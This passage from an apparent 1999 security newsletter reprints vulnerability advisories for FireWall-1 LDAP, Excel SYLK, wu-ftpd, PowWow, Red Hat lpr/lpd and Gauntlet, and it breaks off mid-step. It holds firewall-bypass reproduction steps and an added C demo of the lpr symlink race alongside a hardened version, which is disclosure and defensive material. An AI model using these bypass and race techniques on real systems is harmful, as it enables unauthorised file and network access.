               http://support.microsoft.com/support/kb/articles/q241/9/00.asp
               
               
               
      @HWA
      
68.0  Checkpoint Firewall-1 LDAP Authentication Vulnerability
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      bugtraq id   725
      class        Access Validation Error
      cve          GENERIC-MAP-NOMATCH
      remote       Yes
      local        No
      published    October 20, 1999
      updated      October 20, 1999
      
      vulnerable
      
              Checkpoint Software Firewall-1 4.0
              
      not vulnerable
      
              Checkpoint Software Firewall-1 3.0.0
              
      With FireWall-1 Version 4.0 Checkpoint introduced support for the
      Lightweight Directory Access Protocol (LDAP) for user authentication. It
      looks like there's a bug in Checkpoint's ldap code which under certain
      circumstances can lead to unauthorized access to protected systems
      behind the firewall.
     
      A user can authenticate himself at the firewall providing a valid
      username and password. The firewall acts as a ldap client, validating
      the credentials by a directory server using the ldap protocol. After
      successful authentication access will be granted to systems protected
      by the firewall.
     
      In contrast to authentication using the Radius or SecurID protocol, after
      successful authentication the directory server can supply the firewall
      with additional ldap attributes for the user like the time and day of a
      week a user is allowed to login, the source addresses a user can run a
      client from, or the system behind the firewall a user is allowed to access.
      This can be done individually for each user.
     
      In general I think that's a great idea but it seems Checkpoint made
      something wrong interpreting the ldap attribute 'fw1allowed-dst' which is
      supposed to control in detail which protected network object a user can
      access.
      It seems this attribute is ignored by the firewall software, granting
      access to all protected network objects instead.
     
     
     
      Example:
     
                           ------ Server 'Foo'
                           |
      Internet --- FW-1 ---|
                           |
                           ------ Server 'Bar'
     
      Suppose there's a user 'Sid' with access only to Server 'Foo', and a
      second user 'Nancy' with access restricted to Server 'Bar', both
      controlled by the ldap protocol, using the ldap attribute 'fw1allowed-dst'.
      The bug will cause that both, Sid and Nancy, will have access to Foo
      and to Bar.
     
      [Quoted from the post by Olaf Selke with permission]        
      
      credit
      This vulnerability was posted to the Bugtraq mailing list by
      Olaf Selke <olaf.selke@mediaways.net> on Wed, 20 Oct
      1999.

      reference
       web page:
               Firewall-1 Connection Table Paper
               (Lance Spitzner)
               http://www.enteract.com/~lspitz/fwtable.html
               
       web page:
               Checkpoint Technical Support
               (Checkpoint Software)
               http://www.checkpoint.com/techsupport/
               
       message:
               Checkpoint FireWall-1 V4.0: possible bug in
               LDAP authentication
               (Olaf Selke <Olaf.Selke@mediaWays.net>)
               http://www.securityfocus.com/templates/archive.pike?list=1&msg=19991020150002.21047.qmail@tarjan.mediaways.net
               
       
       To: BugTraq     
       Subject: Checkpoint FireWall-1 V4.0: possible bug in LDAP authentication
       Date: Wed Oct 20 1999 09:00:02
       Author: Olaf Selke
       Message-ID: <19991020150002.21047.qmail@tarjan.mediaways.net>
      
      
      Overview:
      
      With FireWall-1 Version 4.0 Checkpoint introduced support for the
      Lightweight Directory Access Protocol (LDAP) for user authentication.
      It looks like there's a bug in Checkpoint's ldap code which under
      certain circumstances can lead to unauthorized access to protected
      systems behind the firewall.
      
      
      Technical background:
      
      A user can authenticate himself at the firewall providing a valid
      username and password. The firewall acts as a ldap client, validating
      the credentials by a directory server using the ldap protocol. After
      successful authentication access will be granted to systems protected
      by the firewall.
      
      In contrast to authentication using the Radius or SecurID protocol,
      after successful authentication the directory server can supply the
      firewall with additional ldap attributes for the user like the time
      and day of a week a user is allowed to login, the source addresses
      a user can run a client from, or the system behind the firewall a user
      is allowed to access. This can be done individually for each user.
      
      In general I think that's a great idea but it seems Checkpoint made
      something wrong interpreting the ldap attribute 'fw1allowed-dst' which
      is supposed to control in detail which protected network object a user
      can access.
      
      It seems this attribute is ignored by the firewall software, granting
      access to all protected network objects instead.
      
      
      Example:
      
                           ------ Server 'Foo'
                           |
      Internet --- FW-1 ---|
                           |
                           ------ Server 'Bar'
      
      
      Suppose there's a user 'Sid' with access only to Server 'Foo', and
      a second user 'Nancy' with access restricted to Server 'Bar', both
      controlled by the ldap protocol, using the ldap attribute
      'fw1allowed-dst'. The bug will cause that both, Sid and Nancy, will
      have access to Foo and to Bar.
      
      
      Conclusion:
      
      I don't consider it as major bug, but it's serious enough that one can't
      rely on access control enforced through ldap. I've reported this problem
      through Checkpoint's support channels two weeks ago, but so far there's
      no response at all.
      
      Attached is the original bug report I've sent to technical support.
      
      Olaf
      --
      Olaf Selke, olaf.selke@mediaways.net, voice +49 5241 80-7069
      
      
      =============================== snip ===============================
      
      firewall: Solaris 2.6, V4.0 SP4 [VPN + DES + STRONG]
      management machine: Solaris 2.6, V4.0 SP4 [VPN + DES + STRONG]
      Directory Server: Solaris 7, Netscape-Directory/4.0 B98.349.0339
      
      
      Today we found that FW-1 seems to ignore the ldap attribute
      'fw1allowed-dst' completely, granting access to 'any' instead.
      If that's really the case, it could lead to a breach of security.
      
      We successfully coupled a FW-1 V4.0 SP4 with a Netscape Directory
      Server according to CP's documentation. Surprisingly this went very
      smoothly ;-) In a second step we checked if the FW software really
      cares about the ldap attributes controlling access in detail, using a
      client authentication rule for this purpose.
      
      It looks like the attributes 'fw1hour-range-from', 'fw1hour-range-to',
      and 'fw1allowed-src' are interpreted as expected by the firewall, so
      I think we didn't make some mistake in general.
      
      However, from our point of view, in any case the ldap attribute
      'fw1allowed-dst' is ignored and silently substituted by 'any'.
      This means a user with restricted access through ldap attributes
      has full access after successful authentication.
      
      @HWA
      
69.0  Microsoft Excel SYLK Macro Execution Vulnerability
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~      
      
      bugtraq id  727
      class       Design Error
      cve         GENERIC-MAP-NOMATCH
      remote      No
      local       Yes
      published   October 20, 1999
      updated     October 20, 1999
      
      vulnerable
      
              Microsoft Excel 97 SR2
              Microsoft Excel 97 SR1
              Microsoft Excel 97
                 - Microsoft Windows 98
                 - Microsoft Windows 95
                 - Microsoft Windows NT 4.0
              Microsoft Excel 2000
              Microsoft Office 97
                 - Microsoft Windows 98
                 - Microsoft Windows 95
                 - Microsoft Windows NT 4.0
              Microsoft Office 2000
              
      When a symbolic link (SYLK) file containing a macro is opened by Excel
      97 or Excel 2000, the user is not warned that a macro will be executed
      upon opening the file (as is customary when Excel opens other
      spreadsheet files containing macros). SYLK files are basic ASCII files
      that can be read by a variety of applications, including word processors
      and other spreadsheet applications. SYLK files can be created using
      the "Save As" function in Microsoft Excel.
      
      Microsoft has released a patch for this vulnerability. It is available at:

      - Excel 97:
      http://officeupdate.microsoft.com/downloadDetails/Xl8p7pkg.htm
      - Excel 2000:
      http://officeupdate.microsoft.com/2000/downloadDetails/XL9p1pkg.htm
      
      credit
      The vulnerability was reported to Microsoft by David Young
      of Derby, UK.

      reference
       advisory:
               MS99-044: Patch Available for "Excel SYLK"
               Vulnerability
               (MS)
               http://www.securityfocus.com/templates/advisory.html?id=1798
               
       web page:
               Microsoft Security Bulletin MS99-044:
               Frequently Asked Questions
               (Microsoft)
               http://www.microsoft.com/security/bulletins/MS99-044faq.asp
               
       web page:
               Q241901: XL2000: Macro Virus Warning Does
               Not Appear Opening SYLK File
               (Microsoft)
               http://support.microsoft.com/support/kb/articles/q241/9/01.asp
       
       web page:
               Q241902: XL97: Macro Virus Warning Does
               Not Appear Opening SYLK File
               (Microsoft)
               http://support.microsoft.com/support/kb/articles/q241/9/02.asp
               
               
      @HWA
      
70.0  Wu-ftpd message Buffer Overflow Vulnerability
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                
      
      bugtraq id  726
      class       Boundary Condition Error
      cve         GENERIC-MAP-NOMATCH
      remote      Yes
      local       No
      published   October 19, 1999
      updated     October 20, 1999
      
      
      vulnerable
      
                 Washington University wu-ftpd 2.5
                 + RedHat Linux 6.1
      
      not vulnerable
       
                Washington University wu-ftpd 2.6.0
                
       There is a buffer overflow in wu-ftpd message file expansions which may
       be remotely exploitable. In situations where the message file can be
       written to in some way remotely by regular or anonymous users, this
       may result in a root compromise. This is detailed in AUSCERT advisory
       AA-1999.01.
       
       Upgrade to the newest version of wu-ftpd not vulnerable to this problem
       (2.6.0 as of Oct 20, 1999), available at the location below:

       ftp://ftp.wu-ftpd.org/pub/wu-ftpd/
       
       credit
      Exposed in AusCERT advisory AA-1999.02, published on
      October 19, 1999.

      reference
       advisory:
              CA-99-13: Multiple Vulnerabilities in WU-FTPD
              (CERT)
              http://www.securityfocus.com/templates/advisory.html?id=1797
              
       advisory:
              AA-99.02: Multiple Vulnerabilities in wu-ftpd
              based daemons
              (AusCERT)
              http://www.securityfocus.com/templates/advisory.html?id=1799
              
       advisory:
              RHSA-1999:043-01: Security problems in
              WU-FTPD
              (RedHat)
              http://www.securityfocus.com/templates/advisory.html?id=1801
              
               
       @HWA
       
71.0  Tribal Voice PowWow Password Vulnerabilities
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      bugtraq id  724
      class       Unknown
      cve         GENERIC-MAP-NOMATCH
      remote      Yes
      local       Yes
      published   October 19, 1999
      updated     October 19, 1999
      
      vulnerable
      
              Tribal Voice PowWow 3.73
                 - Microsoft Windows 98
                 - Microsoft Windows 95
                 - Microsoft Windows NT 4.0      
       
       PowWow is a network communications tool by Tribal Voice, similar to
      ICQ or AOL Instant Messenger. PowWow contains several vulnerabilities
      whereby a user's PowWow password can be obtained by an attacker. 
     
      The first vulnerability involves the powwow.ini file, where a user's name
      and password are stored in plaintext. This file can be found at
      C:\windows\powwow.ini on Win9x platforms and at C:\winnt\powwow.ini
      on NT machines. The entries look like this:
     
      LOCALNAME:user @ server.com
      LOCALPASS:user's_password
     
      The second vulnerability is related to how PowWow transmits the
      password to the PowWow server to authenticate the user in various
      operations, mostly related to listings in the PowWow white pages. The
      password is sent via the URL, in plaintext, meaning it is visible in
      the address bar or (later) the history list of the browser being used,
      and can also be captured by sniffing at any intermediary point on the
      network. For example, the URL used to remove oneself from the White
      pages listing is:
     
      http ://ww2.tribal.com/white_pages/RemoveWpfromPow.cfm?PowID=user
      @ server.com&Pswd=user's_password
     
      The third vulnerability is in Tribal Voice's free email service for PowWow
      users. During the sign-up process, the user's password is displayed
      back to them in a web page, which once again can be viewed by anyone
      in the vicinity or retrieved via sniffing or the browser's local cache.
     
      Also, this free email service allows the option of having it log into a POP
      server elsewhere as the user, retrieving your mail, and presenting it to
      you in your PowWow inbox. To do this, you enter the info for your POP
      account into a web form at Tribal Voice, and they store it at the server
      for later use. This means that the user's password is stored remotely
      (encryption/security practices unknown), which leads to two problems:

      1) If the Tribal Voice server is compromised, all users using this
      option could have their POP accounts elsewhere compromised as well.

      2) Attackers could use this service to remotely access POP accounts
      they have hacked/obtained, with an added level of anonymity.
      
      Tribal Voice has claimed that the powwow.ini issue will be fixed in a
      future release of the product. Password storage can be disabled via the
      preferences button in the program (default is On).
      
      credit
      
      Original information submitted to Security Focus by Jim
      Williams <netsecurity.guide@about.com>. Additional
      research by Ben Greenbaum of Security Focus.

      reference
       
       web page:Tribal Voice Homepage
               (Tribal Voice)
               http://www.tribal.com/
               
               
      @HWA         
                                   
72.0  RedHat lpr/lpd Vulnerabilities           
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      bugtraq id  718
      object      lpr and lpd (exec)
      class       Race Condition Error
      cve         GENERIC-MAP-NOMATCH
      remote      No
      local       Yes
      published   October 18, 1999
      updated     October 18, 1999
      
      vulnerable
      
              RedHat Linux 6.1
              RedHat Linux 6.0
              RedHat Linux 5.2
              RedHat Linux 5.1
              RedHat Linux 5.0
              RedHat Linux 4.2
              RedHat Linux 4.1
              RedHat Linux 4.0
              
      The lpr packages that ship with RedHat Linux releases 4.x to 6.1 contain
      vulnerabilities which may allow printing of files for which read access is
      not allowed. The first of the two problems is a race condition that can be
      exploited between the access checking and the opening of the file. The
      second is a symlink attack that could also be used to print files that
      normally cannot be read by a regular user (through lpr -s).        
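
      The check-then-open race described above, as an added C example (it is
      not Red Hat's patch and not code from lpr or lpd): open_check_then_use
      is the racy pattern, open_as_invoker is one common hardened form. All
      function names, the window_fn hook and the temporary files are
      constructed for illustration.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE               /* O_NOFOLLOW and mkdtemp on glibc */
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical hook standing in for whatever another local process does
 * between the check and the open; NULL means the window stays quiet. */
typedef void (*window_fn)(const char *path);

/* Racy pattern: access() judges the name with the real uid, open() then
 * resolves the name again with the effective uid (root for a setuid
 * program). Nothing ties the two lookups to the same file. */
int open_check_then_use(const char *path, window_fn in_window)
{
    if (access(path, R_OK) != 0)
        return -1;
    if (in_window)
        in_window(path);
    return open(path, O_RDONLY);
}

/* Hardened form: let the kernel do the permission check during a single
 * open() made with the invoking user's rights, refuse a symlink as the
 * final path component, and validate the descriptor rather than the name. */
int open_as_invoker(const char *path)
{
    uid_t saved = geteuid();
    struct stat st;
    int fd, err;
    if (seteuid(getuid()) != 0)
        return -1;
    fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);
    err = errno;
    if (seteuid(saved) != 0) {            /* cannot restore: fail closed */
        if (fd >= 0) close(fd);
        return -1;
    }
    if (fd < 0) { errno = err; return -1; }
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode)) {
        close(fd);
        errno = EACCES;
        return -1;
    }
    return fd;
}

static char other_path[64];   /* constructed: file the name is re-pointed to */

static void repoint_to_other(const char *path)
{
    unlink(path);
    if (symlink(other_path, path) != 0)
        perror("symlink");
}

static int is_same_file(int fd, const char *path)
{
    struct stat a, b;
    return fd >= 0 && fstat(fd, &a) == 0 && stat(path, &b) == 0 &&
           a.st_dev == b.st_dev && a.st_ino == b.st_ino;
}

static int make_file(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
    return fd < 0 ? -1 : close(fd);
}

/* Bit 1: hardened open accepts a plain file. Bit 2: racy open ends up on
 * the other file. Bit 4: hardened open refuses the re-pointed name. */
int run_demo(void)
{
    char dir[] = "/tmp/toctou-demo-XXXXXX";
    char job[64];
    int result = 0, fd;
    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(job, sizeof job, "%s/job", dir);
    snprintf(other_path, sizeof other_path, "%s/other", dir);
    if (make_file(job) != 0 || make_file(other_path) != 0)
        return -1;
    if ((fd = open_as_invoker(job)) >= 0) { result |= 1; close(fd); }
    fd = open_check_then_use(job, repoint_to_other);
    if (is_same_file(fd, other_path)) result |= 2;
    if (fd >= 0) close(fd);
    if ((fd = open_as_invoker(job)) < 0) result |= 4; else close(fd);
    unlink(job); unlink(other_path); rmdir(dir);
    return result;
}

int main(void)
{
    return run_demo() == 7 ? 0 : 1;   /* 7: all three checks held */
}
```

      O_NOFOLLOW only rejects a symlink in the final path component, so a
      spool directory that other users can write to still needs its own
      ownership and mode checks.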
      
      Patched versions of the lpr packages are available at the links listed
      below:
     
      Red Hat Linux 4.x:
     
      Intel:
      ftp://ftp.redhat.com/pub/redhat/updates/4.2/i386/lpr-0.43-0.4.2.i386.rpm
     
      Alpha:
      ftp://ftp.redhat.com/pub/redhat/updates/4.2/alpha/lpr-0.43-0.4.2.alpha.rpm
     
      Sparc:
      ftp://ftp.redhat.com/pub/redhat/updates/4.2/sparc/lpr-0.43-0.4.2.sparc.rpm
     
      Source packages:
      ftp://ftp.redhat.com/pub/redhat/updates/4.2/SRPMS/lpr-0.43-0.4.2.src.rpm
     
      Red Hat Linux 5.x:
     
      Intel:
      ftp://ftp.redhat.com/pub/redhat/updates/5.2/i386/lpr-0.43-0.5.2.i386.rpm
     
      Alpha:
      ftp://ftp.redhat.com/pub/redhat/updates/5.2/alpha/lpr-0.43-0.5.2.alpha.rpm
     
      Sparc:
      ftp://ftp.redhat.com/pub/redhat/updates/5.2/sparc/lpr-0.43-0.5.2.sparc.rpm
     
      Source packages:
      ftp://ftp.redhat.com/pub/redhat/updates/5.2/SRPMS/lpr-0.43-0.5.2.src.rpm
     
      Red Hat Linux 6.x:
     
      Intel:
      ftp://ftp.redhat.com/pub/redhat/updates/6.1/i386/lpr-0.43-2.i386.rpm
     
      Alpha:
      ftp://ftp.redhat.com/pub/redhat/updates/6.0/alpha/lpr-0.43-2.alpha.rpm
     
      Sparc:
      ftp://ftp.redhat.com/pub/redhat/updates/6.0/sparc/lpr-0.43-2.sparc.rpm
     
      Source packages:
      ftp://ftp.redhat.com/pub/redhat/updates/6.1/SRPMS/lpr-0.43-2.src.rpm
     
      The MD5 sums for each of these packages are available in the advisory
      linked to from the references section.
      
      credit
      Released in RedHat advisory RHSA-1999:041-01 on
      October 17, 1999.

      reference
       
       advisory:
               RHSA-1999:041-01: File access problems in
               lpr/lpd
               (RedHat)
               http://www.securityfocus.com/templates/advisory.html?id=1792
       
       web page:
               Updates, Fixes, and Errata Page
               (RedHat)
               http://www.redhat.com/corp/support/errata/index.html
               
      RHSA-1999:041-01: File access problems in lpr/lpd
      Published: Sun Oct 17 1999
      Updated: Mon Oct 18 1999 
      
      
      
      ---------------------------------------------------------------------
                         Red Hat, Inc. Security Advisory
      
      Synopsis:               File access problems in lpr/lpd
      Advisory ID:            RHSA-1999:041-01
      Issue date:             1999-10-17
      Updated on:
      Keywords:               lpr lpd permissions
      Cross references:
      ---------------------------------------------------------------------
      
      1. Topic:
      
      There are potential problems with file access checking in
      the lpr and lpd programs. These could allow users to
      potentially print files they do not have access to. Also,
      there are bugs in remote printing in the lpd that shipped
      with Red Hat Linux 6.1.
      
      2. Bug IDs fixed (http://developer.redhat.com/bugzilla for more info):
      
      5122 5540 5697 5832 5835 5903 5949
      
      3. Relevant releases/architectures:
      
      Red Hat Linux 4.x, all architectures
      Red Hat Linux 5.x, all architectures
      Red Hat Linux 6.x, all architectures
      
      4. Obsoleted by:
      
      5. Conflicts with:
      
      6. RPMs required:
      
      Red Hat Linux 4.x:
      
      Intel:
        ftp://ftp.redhat.com/pub/redhat/updates/4.2/i386/lpr-0.43-0.4.2.i386.rpm
      
      Alpha:
        ftp://ftp.redhat.com/pub/redhat/updates/4.2/alpha/lpr-0.43-0.4.2.alpha.rpm
      
      Sparc:
        ftp://ftp.redhat.com/pub/redhat/updates/4.2/sparc/lpr-0.43-0.4.2.sparc.rpm
      
      Source packages:
        ftp://ftp.redhat.com/pub/redhat/updates/4.2/SRPMS/lpr-0.43-0.4.2.src.rpm
      
      Red Hat Linux 5.x:
      
      Intel:
        ftp://ftp.redhat.com/pub/redhat/updates/5.2/i386/lpr-0.43-0.5.2.i386.rpm
      
      Alpha:
        ftp://ftp.redhat.com/pub/redhat/updates/5.2/alpha/lpr-0.43-0.5.2.alpha.rpm
      
      Sparc:
        ftp://ftp.redhat.com/pub/redhat/updates/5.2/sparc/lpr-0.43-0.5.2.sparc.rpm
      
      Source packages:
        ftp://ftp.redhat.com/pub/redhat/updates/5.2/SRPMS/lpr-0.43-0.5.2.src.rpm
      
      Red Hat Linux 6.x:
      
      Intel:
        ftp://ftp.redhat.com/pub/redhat/updates/6.1/i386/lpr-0.43-2.i386.rpm
      
      Alpha:
        ftp://ftp.redhat.com/pub/redhat/updates/6.0/alpha/lpr-0.43-2.alpha.rpm
      
      Sparc:
        ftp://ftp.redhat.com/pub/redhat/updates/6.0/sparc/lpr-0.43-2.sparc.rpm
      
      Source packages:
        ftp://ftp.redhat.com/pub/redhat/updates/6.1/SRPMS/lpr-0.43-2.src.rpm
      
      7. Problem description:
      
      There are two problems in the lpr and lpd programs. By
      exploiting a race between the access check and the actual
      file opening, it is potentially possible to have lpr read
      a file as root that the user does not have access to. Also,
      the lpd program would blindly open queue files as root; by
      use of the '-s' flag to lpr, it was possible to have lpd print
      files that the user could not access.
      
      Thanks go to Tymm Twillman for pointing out these
      vulnerabilities.
      
      Also, various bugs in remote printing that were present
      in the lpd released with Red Hat Linux 6.1 have been fixed.
      
      8. Solution:
      
      For each RPM for your particular architecture, run:
      
      rpm -Uvh <filename>
      
      where filename is the name of the RPM.
      
      9. Verification:
      
      MD5 sum                           Package Name
      --------------------------------------------------------------------------
      fb854cbddc9e38847c31aa6e07904ae6  lpr-0.43-0.4.2.i386.rpm
      10d7f947c5e1e2ac13c88fec95e53838  lpr-0.43-0.4.2.alpha.rpm
      aea5f8564289be2f344169ba89da5ff7  lpr-0.43-0.4.2.sparc.rpm
      faaa81630ac3d5de295deec4c0cb2883  lpr-0.43-0.4.2.src.rpm
      
      39dddd66751ae7e8e5b6fc179d61dd88  lpr-0.43-0.5.2.i386.rpm
      479537d92946838857276967d6fb4e98  lpr-0.43-0.5.2.alpha.rpm
      b8c3970d327b1bdd3c14b933b4dab5c0  lpr-0.43-0.5.2.sparc.rpm
      3aa3386da05e96adc04db5b376f307dd  lpr-0.43-0.5.2.src.rpm
      
      cc1f97635c0a1029febc1f0e75e40527  lpr-0.43-2.i386.rpm
      9c611726e6ec6f754e0b6503f87b8e97  lpr-0.43-2.alpha.rpm
      1e8ff6f9f3272f30ca96f4dcdfdc9b53  lpr-0.43-2.sparc.rpm
      2c258e8aa98f5b005b326f3110410965  lpr-0.43-2.src.rpm
      
      These packages are signed with GnuPG by Red Hat Inc. for security. Our key
      is available at:
      
      http://www.redhat.com/corp/contact.html
      You can verify each package with the following command:
      
      rpm --checksig <filename>
      
      If you only wish to verify that each package has not been corrupted or
      tampered with, examine only the md5sum with the following command:
      
      rpm --checksig --nogpg <filename>
      
      Note that you need RPM >= 3.0 to check GnuPG keys.
      
      10. References:
      
      @HWA        
      
73.0  Gauntlet Firewall Rules Bypass Vulnerability
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~       
      
      bugtraq id  721
      class       Design Error
      cve         GENERIC-MAP-NOMATCH
      remote      Yes
      local       Yes
      published   October 18, 1999
      updated     October 18, 1999
      
      vulnerable
      
              Network Associates Gauntlet Firewall 5.0
              
      It may be possible to violate all firewall rules if certain conditions are met
      when Gauntlet Firewall 5.0 is installed on the BSDI platform with a
      specific configuration. The following things need to happen in the order
      listed below for Gauntlet to be exploitable:
     
      1) Install BSDI 3.1 
     
      2) Install Gauntlet 5.0 
     
      3) Install BSDI patch M310-049 
     
      4) Install Gauntlet 5.0 kernel patch level 2
     
      5) Remove any proxy settings on client machine.
     
      6) Set the default route on the client machine and attempt to connect to
      any host through a normal tcp connection.
     
      This problem surfaces when connections are made through any
      adaptive proxy, "old" proxy or no proxy at all. In order to exploit this, a
      route will need to be specified since NAT will not occur when data is sent
      through the affected firewall. 
     
      None of the connections that ignore the rules are logged in
      /var/log/messages.
     
      Keith Young describes how to replicate the problem (this is taken
      directly from his bugtraq post):
     
     
      1) Install BSDI 3.1, March 1998. Use automatic install, however you may
      install minimal packages if you wish.
      2) Mount the Gauntlet 5.0 CD-ROM. Execute /cdrom/fwinstall
      3) Install Gauntlet 5.0.
      4) Reboot after installation.
      5) Login as root. 
      6) Enter "Fast GUI Setup". Fill in appropriate Interface settings for
      external and internal interfaces. If necessary, configure ESPM hosts,
      DNS settings, and admin
      users.
      7) Quit gauntlet-admin, save changes, and rebuild.
      8) After proxies have reconfigured, reboot machine.
      9) Since M310-049 is required for Gauntlet kernel patch install, and
      M310-046 is required for M310-049 installation, download both from
      ftp://ftp.bsdi.com/bsdi/patches/patches-3.1/
      File info:
      M310-046 1194 Kb Wed Oct 14 00:00:00 1998
      M310-049 116 Kb Wed Dec 16 00:00:00 1998
      Both patches are considered "OK" by the Gauntlet support site:
      http://www.tis.com/support/bsd31.html
     
      10) Bring machine to single-user mode by executing "kill -term 1".
      11) Execute "perl5 M310-046 apply" to install BSDI libc patch.
      12) Execute "perl5 M310-049 apply" to install IP DoS fix.
      13) Execute "cd /sys/compile/GAUNTLET-V50/".
      14) Build new kernel as required by M310-049 IP DoS kernel fix. 
      # make clean
      # make depend
      # make
      15) After kernel is rebuilt, reboot machine.
      16) Download Gauntlet 5.0 kernel and cluster patch:
      File info:
      cluster.BSDI.patch 12623 Kb Wed Sep 01 19:33:00 1999
      kernel.BSDI.patch 414 Kb Wed Aug 04 17:54:00 1999
      17) As noted in patch install directions, execute the following:
      # sh ./cluster.BSDI.patch
      # sh ./kernel.BSDI.patch
      # cd kernel.BSDI.patch
      # sh ./apply
      # cd ../cluster.BSDI.patch
      # sh ./apply
      18) After patches are installed, reboot machine.
      19) Install ESPM-GUI on client machine. Start ESPM-GUI. Add client
      machine to trusted network group. Apply changes.
     
      20) Start web browser on client machine. Set web proxy setting to
      internal interface of firewall. Attempt to connect to external web server.
      Access is allowed. *This is correct.*
     
      20) Remove http-gw from trusted network services. Apply changes.
      Attempt to connect to external web server. Access is denied. *This is
      correct.*
     
      ==Problem starts here==
     
      21) Remove proxy setting in web browser on client machine. Set
      gateway/default route on client machine to internal interface of firewall.
      Set gateway/default
      route on server machine to external interface of firewall.
     
      22) Clear web browser cache. Attempt to connect to external web
      server.
      Web page is downloaded with no logs in Gauntlet.
     
      23) Start ESPM-GUI. Remove all services from trusted networks
      services.
      Remove client machine from ESPM network group. Apply changes.
     
      24) FTP from client machine to server. FTP connection is made though
      no
      rule exists.
     
      25) Start telnet server on client machine. Telnet from server to client.
      Telnet connection is made.  
      
      Network Associates has released a patch for this problem. Contact the
      vendor for more information.      
      
      credit
      First posted to BugTraq by Keith Young
      <kyoung@v-one.com> on October 18,
      1999.

      reference
       web page:
               Gauntlet Firewall Unix
               (Network Associates Inc.)
               http://www.nai.com/asp_set/products/tns/gauntletunix_intro.asp
               
       message:
               Gauntlet 5.0 BSDI warning
               (Keith Young <kyoung@v-one.com>)
               http://www.securityfocus.com/templates/archive.pike?list=1&msg=380B47D4.32B1655C@v-one.com
               
      
       To: BugTraq
       Subject: Gauntlet 5.0 BSDI warning
       Date: Mon Oct 18 1999 00:16:20
       Author: Keith Young
       Message-ID: <380B47D4.32B1655C@v-one.com>
      
      
                      Security issue in Gauntlet 5.0 BSDI when
                      BSDI patches are installed in a specific order
                      by Keith Young
                      (kyoung@v-one.com)
                      -=0=--=0=--=0=--=0=--=0=--=0=--=0=--=0=--=0=-
      
      SYSTEM AFFECTED -
              Gauntlet 5.0 BSDI with latest Gauntlet patches
              Other Gauntlet 5.0 patched systems are not affected
              Unpatched Gauntlet 5.0 BSDI is not affected
      
      
      SYNOPSIS -
              Local trusted and remote non-trusted users with routes through
              firewall may bypass all Gauntlet security rules.
              No activity will appear in the /var/log/messages log file.
              Internal network scheme is exposed.
      
              This issue will appear if you do the following in sequence:
              1) Install BSDI 3.1
              2) Install Gauntlet 5.0
              3) Install BSDI patch M310-049
              4) Install Gauntlet 5.0 kernel patch level 2
      
      
      VENDOR CONTACT -
              Vendor has been contacted and trouble ticket assigned.
              Patch will be released soon.
      
      
      OTHER NOTES -
              A) Behavior occurs if connection is through any adaptive proxy
              (http-pdk), "old" proxy (http-gw) or no proxy at all (any TCP
              connection).
              B) Packets will not be NATed by firewall, so to be 100%
              successful, a route will need to be published to get to your
              internal network through your firewall.
              C) As mentioned, nothing is ever logged in /var/log/messages
              D) Adding NATs to Gauntlet does not change the packets.
      
      
      SOLUTIONS -
              A) Install M310-049 *before* installing Gauntlet 5.0.
              B) A vendor patch/fix/suggestion is coming.
              C) Workaround - **Neither myself, V-ONE, nor NAI is responsible for the
              correct/incorrect use of this.**
              **Doing this may adversely affect your system and may void tech
              support.**
                      (as root)
                      1) # cp /usr/local/sys.gauntlet/i386/OBJ/ip_input.o /usr/src/sys/i386/OBJ
                      2) # sh /usr/local/sys.gauntlet/build_kernel/build_kernel 50.1
                      3) # reboot
      
      
      HOW TO REPRODUCE -
      
              Network configuration:
      
              [client]====[firewall]====[WWW/FTP-server]
              (internal)                (external)
              Client/Server: either Win98 or RedHat Linux 6.0, P2-350, 128MB RAM
              Firewall: P2-350, 256MB RAM, 10GB hard drive, any BSDI-compatible NIC
      
              All network connections done via 10baseT crossover cables, however
              users can be across hubs or routers.
      
      Listed here are the exact steps needed to reproduce this problem.
      
      1) Install BSDI 3.1, March 1998. Use automatic install, however you may
      install minimal packages if you wish.
      2) Mount the Gauntlet 5.0 CD-ROM. Execute /cdrom/fwinstall
      3) Install Gauntlet 5.0.
      4) Reboot after installation.
      5) Login as root.
      6) Enter "Fast GUI Setup". Fill in appropriate Interface settings for
      external and internal interfaces. If necessary, configure ESPM hosts,
      DNS settings, and admin users.
      7) Quit gauntlet-admin, save changes, and rebuild.
      8) After proxies have reconfigured, reboot machine.
      9) Since M310-049 is required for Gauntlet kernel patch install, and
      M310-046 is required for M310-049 installation, download both from
      ftp://ftp.bsdi.com/bsdi/patches/patches-3.1/
              File info:
              M310-046        1194 Kb    Wed Oct 14 00:00:00 1998
              M310-049        116 Kb     Wed Dec 16 00:00:00 1998
      Both patches are considered "OK" by the Gauntlet support site:
      http://www.tis.com/support/bsd31.html
      
      10) Bring machine to single-user mode by executing "kill -term 1".
      11) Execute "perl5 M310-046 apply" to install BSDI libc patch.
      12) Execute "perl5 M310-049 apply" to install IP DoS fix.
      13) Execute "cd /sys/compile/GAUNTLET-V50/".
      14) Build new kernel as required by M310-049 IP DoS kernel fix.
              # make clean
              # make depend
              # make
      15) After kernel is rebuilt, reboot machine.
      16) Download Gauntlet 5.0 kernel and cluster patch:
              File info:
              cluster.BSDI.patch      12623 Kb    Wed Sep 01 19:33:00 1999
              kernel.BSDI.patch       414 Kb      Wed Aug 04 17:54:00 1999
      17) As noted in patch install directions, execute the following:
              # sh ./cluster.BSDI.patch
              # sh ./kernel.BSDI.patch
              # cd kernel.BSDI.patch
              # sh ./apply
              # cd ../cluster.BSDI.patch
              # sh ./apply
      18) After patches are installed, reboot machine.
      19) Install ESPM-GUI on client machine. Start ESPM-GUI. Add client
      machine to trusted network group. Apply changes.
      20) Start web browser on client machine. Set web proxy setting to
